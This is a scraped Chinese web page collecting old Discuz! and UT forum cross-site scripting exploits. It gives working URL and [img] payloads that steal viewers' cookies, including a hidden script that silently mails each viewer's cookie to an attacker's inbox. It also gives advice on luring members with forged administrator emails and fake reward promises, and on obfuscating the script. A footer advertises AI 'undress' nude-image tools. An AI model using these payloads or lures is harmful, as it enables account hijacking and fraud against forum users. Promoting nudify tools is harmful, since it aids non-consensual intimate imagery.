Discuz!跨站大全_PHP
在discuz!的发贴、回贴、PM等中的subject都没有经过过滤,所以也可以添加代码。
例如
http://xxx/post.php?action=newthread&fid=2...cript%3E%3Cb%22
效果是首先弹出自己的cookie
利用方法:把上述代码放置到img中。
适用版本:discuz!2.x
discuz!3.x
一种利用discuz!2.0漏洞进行欺骗获得cookie的尝试
通过测试XXXFan论坛的PM功能存在一个安全漏洞,具体描述如下:
XXXFan的给某个会员发送悄悄的链接如下(假定这个会员名字为XXXFan)
http://XXX/pm.php?action=send&username=XXXFan
因为论坛程序对会员名字没有进行过滤,而是直接显示在发送到栏目中(TO:),所以可以在名字后面加上script代码。例如
http://XXX/pm.php?action=send&username=XXXFan ";><script>alert(document..cookie)</script>
上面的链接点击以后首先弹出的是自己的cookie内容。
当然我们可以先在自己的站点上构造一个程序来收集cookie,类似于
getcookie.php?cookie=
但是如何来诱使会员点击呢,如果简单的放在论坛上,太容易被识别。所以可以利用discuz论坛程序的另外一个功能,“帖子介绍给朋友”功能。
因为discuz的这个功能对填写的emial地址没有进行任何过滤、辨别和模版,可以伪造任何人给别人发信,安全性很高。利用这个功能我们就可以伪造ExploitFan的管理员给某个会员发一封信,诱使会员点击我们准备的URL,如果诱使就看自己的手段了,例如可以说“论坛正在测试新功能,请您协助点击上面地址,我们会在后台记录您的点击在合适的时间会给您增加积分以做奖励”等等。
因为链接地址是XXXFan的,而且发信人和邮件地址都是XXXFan的官方地址,所以可信度非常高,而且不会留下任何把柄。当然为了更高的安全性,可以在<script>里的内容加密,以进一步增加隐蔽性。 <br /><br />至于得到cookie如何做,可以尝试cookie欺骗或者是暴力破解MD5密码 <br /><br />本方法适用于大部分使用discuz2.0的论坛,至于discuz3.0的利用方法请参与在我以前发表的discuz!悄悄话漏洞 <br />【BUG】Discuz!投票的BUG <br />投票可以用 <br />misc.php?action=votepoll&fid=2&tid=16980&pollanswers[]=n <br />(n为选项,从0开始) <br />的方式通过URL来直接投票 <br /><br />但是如果n>最大选项呢,嘻嘻~ <br />照样提交成功,不过增加了一个标题为空的选项 <br /><br />效果见: <br />http://discuz.net/viewthread.php?tid=20020&sid=dymPEc <br />(那个最后的空白的是我刚加的) <br /><br />该漏洞存在的版本: <br />Discuz!3.X <br />Discuz!2.X(可能,没有测试过) <br />Discuz!的代码漏洞 <br />这是接着昨天发现的漏洞所展开的,第一发现者(PK0909)。 <br /><br />具体的描述就不说了,下面是一个简单的测试代码。 <br /><br />http://www.xxxx.net/phpbbs/post.php?action...%3C%2Fscript%3E <br /><br />上面的代码是显示出自己的cookie <br /><br />下面是在某个比较有名的论坛的测试代码,无论谁察看该网页都会把cookie送到指定的会员短信箱里,隐蔽性很好,就是如果有人引用你的贴,哈哈~这里都会跑出来,露馅了 <br /><br />[ img]http://xxx.com/xx.gif%22%20style=display:none%3e%3c/img%3e%3cscript%3evar%20Req=new%20ActiveXObject(%22MSXML2.XMLHTTP%22);Req.open(%22post%22,%22http://www.XXXX.com/forum/pm.php?action=send%22,false);var%20forms=%22pmSubmit=Submit%22.toLowerCase()%2B%22%26msgto=XXXXX%26subject=cookie%26saveoutbox=0%26message=%22%2Bescape(document..cookie);Req.setRequestHeader(%22Content-length%22,forms.length)%3BReq.setRequestHeader(%22CONTENT-TYPE%22,%22application/x-www-form-urlencoded%22);Req.send(forms);%3c/script%3e%3cb%22 [ /img] <br />发现discuz!UT 跨域站点的脚本漏洞--短消息篇有关跨域站点的脚本漏洞,已经算是非常平成并普遍的漏洞了。 <br />有关具体的消息可以参阅: <br />http://www.cert.org/advisories/CA-2000-02.html <br />下面针对Discuz、UT论坛程序的悄悄话部分加以说明 <br /><br />漏洞适应版本: <br />Discuz1.X <br />Discuz!2.0(0609,0820版) <br />Discuz!3.X <br />UT 1.0 <br /><br />漏洞描述: <br /><br />discuz!给指定会员发送悄悄话使用的是类似http://www.XXXX.net/phpbbs/pm.php?action=send&username=name 的语句,但是name没有经过过滤直接显示在发送短消息的页面中,这就给偷cookie或者更严重的破坏打开了方便之门。 <br /><br />Discuz!3.X已经改为http://XXX.net/pm.php?action=send&uid=XXXX类似的语句,避免了这个漏洞,但是在选择短信文件夹的时候却没有经过过滤。同样产生了上面的漏洞 <br /><br /><br />例 <br />http://www.XXXX.net/phpbbs/pm.php?action=s...d&username=name %22%3E%3Cscript%3Ealert(document..cookie)%3C/script%3E%3Cb%22[/url] <br />,上面的例子是显示自己的cookie。(针对Discuz!1.X Discuz!2.X) <br /><br />http://XXX.net/pm.php?folder=inbox%22%3E%3...cript%3E%3Cb%22 <br />显示自己的cookie。(针对Discuz!3.X) <br /><br />UT虽然在主题上经过了过滤,也就是说把%27转换为';但是其收件人却没有过滤,所以同样有类似的漏洞。例子略。(在不同的UT论坛上发现其代码不尽相同,但是总的来说都有类似的漏洞) <br /><br /><br />危害度:中弱 <br /><br />预防办法: <br />点击超级链接时请注意其真实内容。更多的安全补丁请密切关注官方论坛。
</script>
Hot AI Tools
Undresser.AI Undress
AI-powered app for creating realistic nude photos
AI Clothes Remover
Online AI tool for removing clothes from photos.
Undress AI Tool
Undress images for free
Clothoff.io
AI clothes remover
Video Face Swap
Swap faces in any video effortlessly with our completely free AI face swap tool!
Hot Article
Hot Tools
Notepad++7.3.1
Easy-to-use and free code editor
SublimeText3 Chinese version
Chinese version, very easy to use
Zend Studio 13.0.1
Powerful PHP integrated development environment
Dreamweaver CS6
Visual web development tools
SublimeText3 Mac version
God-level code editing software (SublimeText3)
Hot Topics
1386
52
Detailed explanation of Discuz registration process: allowing you to easily modify personal information
Mar 13, 2024 pm 12:21 PM
"Detailed Explanation of Discuz Registration Process: Allowing you to easily modify personal information, specific code examples are required" Discuz is a powerful community forum program that is widely used in various websites. It provides a wealth of user registration and personal information modification. functions and interfaces. This article will introduce you to Discuz's registration process in detail and provide specific code examples to help you easily customize and modify your personal information. 1. User registration process In Discuz, user registration is one of the important functions of the site. The smoothness of the registration process and
A must-have for Discuz users! Comprehensive analysis of renaming props!
Mar 12, 2024 pm 10:15 PM
A must-have for Discuz users! Comprehensive analysis of renaming props! In the Discuz forum, the name change function has always received much attention and demand from users. For some users who need to change their name, name change props can easily modify the user name, and this is also an interesting way of interaction. Let’s take an in-depth look at the renaming props in Discuz, including how to obtain them, how to use them, and solutions to some common problems. 1. Obtain name-changing props in Discuz. Name-changing props are usually purchased through points or the administrator
Discuz Forum Permission Management: Read Permission Setting Guide
Mar 10, 2024 pm 05:33 PM
Discuz forum permission management: Read the permission setting guide In Discuz forum management, permission setting is a crucial part. Among them, the setting of reading permissions is particularly important, as it determines the scope of content that different users can see in the forum. This article will introduce in detail the reading permission settings of the Discuz forum and how to flexibly configure it for different needs. 1. Basic concepts of reading permissions In the Discuz forum, reading permissions mainly include the following concepts that need to be understood: Default reading permissions: Default after new user registration
Solve the problem that Discuz WeChat sharing cannot be displayed
Mar 09, 2024 pm 03:39 PM
Title: To solve the problem that Discuz WeChat shares cannot be displayed, specific code examples are needed. With the development of the mobile Internet, WeChat has become an indispensable part of people's daily lives. In website development, in order to improve user experience and expand website exposure, many websites will integrate WeChat sharing functions, allowing users to easily share website content to Moments or WeChat groups. However, sometimes when using open source forum systems such as Discuz, you will encounter the problem that WeChat shares cannot be displayed, which brings certain difficulties to the user experience.
Discuz Editor: Powerful web page editing tool
Mar 09, 2024 pm 06:06 PM
Discuz Editor: A powerful web page editing tool that requires specific code examples. With the development of the Internet, website construction and content editing have become more and more important. As a common web page editing tool, Discuz editor plays an important role in website construction. It not only provides a wealth of functions and tools, but also helps users edit and publish content more conveniently. In this article, we will introduce the features and usage of the Discuz editor, and provide some specific code examples to help readers better understand and use
Discuz background account login exception, how to deal with it?
Mar 09, 2024 pm 05:51 PM
Title: Discuz background account login exception, how to deal with it? When you use the backend management of the Discuz forum system, you may sometimes encounter abnormal account login. This could be due to a variety of reasons, including a wrong password, account being blocked, network connection issues, etc. When encountering this situation, we need to solve the problem through simple troubleshooting and processing. Check whether the account number and password are correct: First, confirm whether the account number and password you entered are correct. When logging in, make sure the capitalization is correct and the password is
Detailed explanation of steps to modify Discuz domain name
Mar 11, 2024 am 11:00 AM
Detailed explanation of the steps to modify the Discuz domain name. Specific code examples are required. With the development and operation of the website, sometimes we need to modify the domain name of the Discuz forum. This may be due to brand change, website SEO optimization, or other reasons. No matter what the reason is, modifying the Discuz domain name is a process that requires careful operation. Today we will introduce the steps of modifying the Discuz domain name in detail and provide specific code examples. Step 1: Back up data. Before modifying the domain name, you must first ensure that the website
Discuz Editor: an efficient post layout tool
Mar 10, 2024 am 09:42 AM
Discuz Editor: An efficient post layout tool. With the development of the Internet, online forums have become an important platform for people to communicate and share information. In the forum, users can not only express their opinions and ideas, but also discuss and interact with others. When publishing a post, a clear and beautiful format can often attract more readers and convey more accurate information. In order to facilitate users to quickly type and edit posts, the Discuz editor came into being and became an efficient post typesetting tool. Discu
